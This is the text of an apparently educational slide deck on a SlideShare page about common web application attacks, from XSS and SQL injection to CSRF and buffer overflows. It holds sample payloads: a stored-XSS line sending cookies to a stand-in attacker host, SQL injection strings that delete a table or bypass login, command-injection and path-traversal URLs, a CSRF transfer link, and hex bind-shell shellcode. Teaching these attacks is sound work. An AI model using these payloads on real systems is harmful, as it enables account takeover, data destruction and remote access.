SlideShare una empresa de Scribd logo

Web application attacks

Descargar como PPTX, PDF
H
hruth

Web application attacks can take many forms, including cross-site scripting (XSS), SQL injection, parameter tampering, command injection, session management issues, cookie poisoning, directory traversal, cross-site request forgery, and buffer overflows. XSS is a vulnerability that allows malicious JavaScript code to be injected and run in a user's browser, potentially accessing data. SQL injection involves inserting SQL commands into a database query to gain unauthorized access. Parameter tampering modifies URL parameters to change expected behavior.

Educación
1 de 37
WEB APPLICATION ATTACKS by Hari Ruthala
What is a Web Application? Any application that is served commonly via http or https protocol Usually being served from a remote computer acting as a host/server
The fact that the vast majority of websites, including those considered most business critical, are riddled with vulnerabilities. Web applications are accessible openly on web there by making it more prone to hacking. Web Developers are not well versed with security issues because of which the applications are prone to vulnerabilities. Web applications run in the browser, any security loop hole in browser will lead to exploiting vulnerability in web application. Inroduction
Technologies Involved
Typical Web Application Structure
Cross-Site Scripting(XXS) SQL Injection Parameter Tampering Command Injection Session Management Cookie Poisoning Directory Traversal Cross-Site Request Forgery Buffer Overflows Common Web application Threats
XSS is a vulnerability which is present in websites or web applications, allows malicious users (Hackers) to insert their client side code (normally JavaScript) in those web pages. When this malicious code along with the original webpage gets displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain greater access of that page. What is Cross- Site Scripting(XSS)?
Cross- Site Scripting(XSS) Attack
Web server gets data from web client (POST, GET etc) with the request. So a malicious User can include client side code snippets (JavaScript) into the data. For example :   <script>alert (‘this site has been hacked’) ;</script> How XSS Works
Non-persistent Persistent DOM Based Type of XSS attacks
Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server. Non-persistent XSS also called as Reflected Xss
In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users. example <SCRIPT> document.location= 'http://attackerhost.example/cgi- bin/cookiesteal.cgi?'+document.cookie </SCRIPT> Persistent XSS also called as stored Xss
Persistent XSS DB Server saves XSS code to DB Server http response with XSS JavaScript http request with XSS JavaScript Hacker’s Browser Normal User Browser
Persistent XSS
DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment. <HTML><TITLE>Welcome!</TITLE>Hi<SCRIPT>var pos= document.URL.indexOf("name=")+5;document.write(document.URL.substring(pos,document.URL.length));</SCRIPT><BR>Welcome to our system…</HTML>  Normally, this HTML page would be used for welcoming the user, e.g.:  http://www.vulnerable.site/welcome.html?name=JoeHowever, a request such as below will result in XSS  http://www.vulnerable.site/welcome.html?name=  <script>alert(document.cookie)</script> DOM based XSS attack
The ability to inject SQL commands in to database engine through an existing application SQL Injection is a vulnerability which exists on the server side and poses a risk to the Database server of the application. ,[object Object]
Insert/Delete data to the database.
Steal private information.What is SQL Injection?
SQL Injection attacking example 1 http://example.com/db.php?id=0 http://example.com/db.php?id=0;DELETE%20FROM%20users <?php $id= $_GET[ 'id' ] ; //$id = 0;DELETE FROM users $result = mysql_query("SELECT * FROM users WHERE id={$id}"); SQL Inject Code User table data destroy
<?php $query = "SELECT * FROM users WHERE users= ' {$_POST['username']} ' AND password= ' {$_POST['password']} ' "; mysql_query($query); //$_POST['username'] = 'bob'; //$_POST['password'] = " ' OR '1'='1 "; echo $query; ?> output: SELECT * FROM users WHERE user='bob' AND password=' ' OR '1'='1' SQL Injection attacking example 2 SQL Inject Code
Parameter tampering is a sophisticated form of hacking that creates a change in the Uniform Resource Locator, or URL, associated with a web page. Essentially, parameter tampering makes it possible for the hacker to gain access to any information entered by an end user on an effected web page, and redirect it to the hacker for unauthorized use. This type of hacking activity is often employed to gain access to personal information such as credit card numbers, government issued identification numbers, and other data that is of a proprietary nature. Parameter Tampering
Parameter Tampering -Example
Parameter Tampering - Example
OS Commanding is an attack technique used for unauthorized execution of operating system commands. This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs. In OS Commanding, executed commands by an attacker will run with the same privileges of the component that executed the command, (e.g. database server, web application server, web server, application). Since the commands are executed under the privileges of the executing component an attacker can leverage this to gain access or damage parts that are otherwise unreachable (e.g. the operating system directories and files). Command Injection
Command Injection Perl - Example open function is part of the API Perl provides for file handling. Improper use of this function may result in OS Commanding since Perl allows piping data from a process into an open statement, by appending a '|' (Pipe) character onto the end of a filename. # The code below executes "/bin/ls" and pipe the output to the open statement open FILE, "/bin/ls|" or die $!; Web applications often include parameters that specify a file that is displayed or used as a template. Without proper input validation, an attacker may change the parameter value to include a shell command followed by the pipe symbol, shown above. If the original URL of the web application is: http://example/cgi-bin/showInfo.pl?name=John&template=tmp1.txt Changing the template parameter value, the attacker can trick the web application into executing the command /bin/ls: http://example /cgi-bin/showInfo.pl?name=John&template=/bin/ls|
In human-computer interaction, session management is the process of keeping track of a user's activity across sessions of interaction with the computer system. HTTP/s Protocol does not provide tracking of a users session. Session tracking answers the question: After a user authenticates how does the server associate subsequent requests to the authenticated user? Typically, Web Application Vendors provide a built-in session tracking, which is good if used properly. Session Management
Session Management Solutions URL Encoding The session token is part of the URL and will be transmitted to the web server through HTTP GET requests Example: http://www.blabla.com/buy.asp?article=27781;sessionid=IE5579901578 Hidden Form Fields It is one of the way to maintain the session. In hidden form fields the html entry will be like this : <INPUT TYPE="hidden" NAME="user"VALUE="Jennifer"> This means that when you submit the form, the specified name and value will be get included in get or post method. In this session ID information would be embedded within the form as a hidden field and submitted with the http post command. Cookies Cookies are a simple session management mechanism The cookie is sent as an HTTP header by a web server to a web browser and then sent back unchanged by the browser each time it accesses that server. HTTP format is Set-Cookie: cookie-value
Session Management Attack Scenarios Session Hijacking Session Replay Session Fixation Session Tempering
Many Web applications use cookies to save information (user IDs, passwords, account numbers, time stamps, etc.) Involve the modification of the contents of a cookie(personal information stored in a Web user's computer) in order to bypass security mechanisms. Cookie poisoning is in fact a Parameter Tampering attack, where the parameters are stored in a cookie Gain unauthorized information about another user and steal Identity. Cookie Poisoning
Cookie Poisoning - Example The request includes a cookie that contains the following parameters: SESSIONID, which is a unique identification string that associates the user with the site, BasketSize, the price of each item and the TotalPrice. when executed by the Web server, buy.asp retrieves the cookie from the user, analyzes the cookie's parameters and charges the user account according to the TotalPrice parameter. An attacker can change, for example, the TotalPrice parameter in order to get a "special discount". GET /store/buy.asp?checkout=yes HTTP/1.0 Host: www.onlineshop.com Accept: */* Referrer: http://www.onlineshop.com/showprods.asp Cookie: SESSIONID=570321ASDD23SA2321; BasketSize=3; Item1=2892; Item2=3210; Item3=9942; TotalPrice=16044;
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. The attacker needs to guess how many directories to climb in order to get to the desired directory. Attackers might view restricted files or execute powerful commands on the Web server, leading to a full compromise of the Web server. Directory Traversal
Directory Traversal - Example Web server, getnews.asp retrieves the file 20March2003.html from the Web server's file system, renders it and sends it back to the browser which presents it to the user. The attacker causes getnews.asp to retrieve the file ../../../../WINNT/win.ini from the file system and send it to the attacker's browser. http://www.acme-hackme.com/online/getnews.asp?item=20March2003.html http://www.acme-hackme.com/online/getnews.asp?item=../../../../ WINNT/win.ini
Description An attack that tricks the victim into loading a page that contains a malicious request. Performs GET/POST request of attacker’s choice on behalf of logged in user The attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website. Also known as Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, and Automation Attack Affected Environments All web application frameworks are vulnerable to CSRF. Cross-Site Request Forgery
CSRF Continued Logging Request Auth Cookies Legitimate Request Bob Bank.com View My Pictuires Money Transfer Hacker sends a Malicious href tag to bob <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
CSRF Continued Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following: However, Maria notices that the same web application will execute the same transfer using URL parameters as follows: Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following POST http://bank.com/transfer.do HTTP/1.1 ... Content-Length: 19; acct=BOB&amount=100 GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a>
Buffer is storage space for data. Buffer overflow occurs when the user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas. It is well known vulnerability Attacker will inject data with shellcode into the allocated stack area. By over-writing return addresses he will run his malicious code. Buffer Overflows
Buffer Overflow Continued Example of shellcode BY NRAZIZ * * */ /* * Binds to port 48138 * Password: haxor */ char bindcode[]= "31db5343536a0289e1b066cd80" "31d2526668bc0a666a0289e26a" "10526a0389e1fec3b066cd806a" "026a0389e1b304b066cd8031c9" "51516a0389e1fec3b066cd8031" "db536a3a685061737389e66a05" "566a0489e1b309b066cd8031c9" "31f6516a05526a0489e1b30ab0" "66cd8031c9516a72686861786f" "89e789d680c105fcf3a675bf31" "c9b304b03fcd804183f90375f6" "31c050682f2f7368682f62696e" "89e3505389e131d2b00bcd80b0" "01cd80“

Recomendados

Network attacks
Network attacksNetwork attacks
Network attacksManjushree Mashal
 
Network security
Network securityNetwork security
Network securityquest university nawabshah
 
Network Security Threats and Solutions
Network Security Threats and SolutionsNetwork Security Threats and Solutions
Network Security Threats and SolutionsColin058
 
Network Security
Network SecurityNetwork Security
Network SecurityMAJU
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 

Recomendados

Network attacks
Network attacksNetwork attacks
Network attacksManjushree Mashal
 
Network security
Network securityNetwork security
Network securityquest university nawabshah
 
Network Security Threats and Solutions
Network Security Threats and SolutionsNetwork Security Threats and Solutions
Network Security Threats and SolutionsColin058
 
Network Security
Network SecurityNetwork Security
Network SecurityMAJU
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Security Vulnerabilities
Security VulnerabilitiesSecurity Vulnerabilities
Security VulnerabilitiesMarius Vorster
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Edureka!
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Network Security and Firewall
Network Security and FirewallNetwork Security and Firewall
Network Security and FirewallShafeeqaFarsana
 
Denial of service
Denial of serviceDenial of service
Denial of servicegarishma bhatia
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101Cybersecurity Education and Research Centre
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGEr Vivek Rana
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingn|u - The Open Security Community
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service AttacksHansa Nidushan
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceEr. Shiva K. Shrestha
 
CYBER SECURITY
CYBER SECURITYCYBER SECURITY
CYBER SECURITYVaishak Chandran
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
System hacking
System hackingSystem hacking
System hackingCAS
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 

Más contenido relacionado

La actualidad más candente

Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Network Security and Firewall
Network Security and FirewallNetwork Security and Firewall
Network Security and FirewallShafeeqaFarsana
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGEr Vivek Rana
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service AttacksHansa Nidushan
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Fabiha Shahzad
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on itWSO2
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilitiesebusinessmantra
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceEr. Shiva K. Shrestha
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
System hacking
System hackingSystem hacking
System hackingCAS
 

La actualidad más candente (20)

Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Network Security and Firewall
Network Security and FirewallNetwork Security and Firewall
Network Security and Firewall
 
Denial of service
Denial of serviceDenial of service
Denial of service
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTING
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Xss attack
Xss attackXss attack
Xss attack
 
Basics of Denial of Service Attacks
Basics of Denial of Service AttacksBasics of Denial of Service Attacks
Basics of Denial of Service Attacks
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
 
Web application vulnerabilities
Web application vulnerabilitiesWeb application vulnerabilities
Web application vulnerabilities
 
DDoS - Distributed Denial of Service
DDoS - Distributed Denial of ServiceDDoS - Distributed Denial of Service
DDoS - Distributed Denial of Service
 
CYBER SECURITY
CYBER SECURITYCYBER SECURITY
CYBER SECURITY
 
Web application security
Web application securityWeb application security
Web application security
 
System hacking
System hackingSystem hacking
System hacking
 

Similar a Web application attacks

Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggetsguestbd1cdca
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009ClubHack
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 

Similar a Web application attacks (20)

Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Application Security
Application SecurityApplication Security
Application Security
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
 
Secure Coding
Secure Coding Secure Coding
Secure Coding
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
Manindra kishore _incident_handling_n_log_analysis - ClubHack2009
 
Web Security
Web SecurityWeb Security
Web Security
 
Security Awareness
Security AwarenessSecurity Awareness
Security Awareness
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 

Último

1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
An Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdfAn Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdfSanaAli374401
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.MateoGardella
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactdawncurless
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...KokoStevan
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfAyushMahapatra5
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
Gardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterGardella_PRCampaignConclusion Pitch Letter
Gardella_PRCampaignConclusion Pitch LetterMateoGardella
 
Measures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDMeasures of Dispersion and Variability: Range, QD, AD and SD
Measures of Dispersion and Variability: Range, QD, AD and SDThiyagu K
 

Último (20)

Advance Mobile Application Development class 07
Advance Mobile Application Development class 07Advance Mobile Application Development class 07
Advance Mobile Application Development class 07
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
An Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdfAn Overview of Mutual Funds Bcom Project.pdf
An Overview of Mutual Funds Bcom Project.pdf
 
Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.Gardella_Mateo_IntellectualProperty.pdf.
Gardella_Mateo_IntellectualProperty.pdf.
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
SECOND SEMESTER TOPIC COVERAGE SY 2023-2024 Trends, Networks, and Critical Th...
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Class 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdfClass 11th Physics NEET formula sheet pdf
Class 11th Physics NEET formula sheet pdf
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
